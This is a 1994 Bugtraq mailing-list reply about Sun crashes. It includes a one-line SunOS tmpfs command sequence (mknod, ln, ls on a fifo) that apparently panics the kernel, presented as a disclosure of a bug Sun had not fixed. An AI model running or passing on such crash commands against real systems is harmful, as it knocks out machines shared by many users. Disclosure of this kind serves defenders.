Bugtraq mailing list archives

Re: udp packet storms - ping death

From: dawagner () phoenix Princeton EDU (David A. Wagner)
Date: Wed, 2 Nov 1994 11:02:52 -0500 (EST)

So you mean that any student at princeton can panic any Sun there just by
typing that command?  Cool...

No -- only two of us students know about it right now, and the
computer center would skin us alive if we spread it around too
much... ;-)

ObBug: if you use the SunOS tmpfs, try

cd /tmp; /usr/etc/mknod fifo p; ln fifo link; ls -ClFg link fifo

...but not at peak hours!

Sun knows about it and after a year, there's still no fix.  [As
far as I know -- if there's one, I'd love to hear of it, so I can
tell the computer center here to add the darn thing: after hearing
of this one, they hacked the kernel and removed the mkfifo and
mknod S_IFIFO system calls. <sigh>]

David Wagner                                             dawagner () princeton edu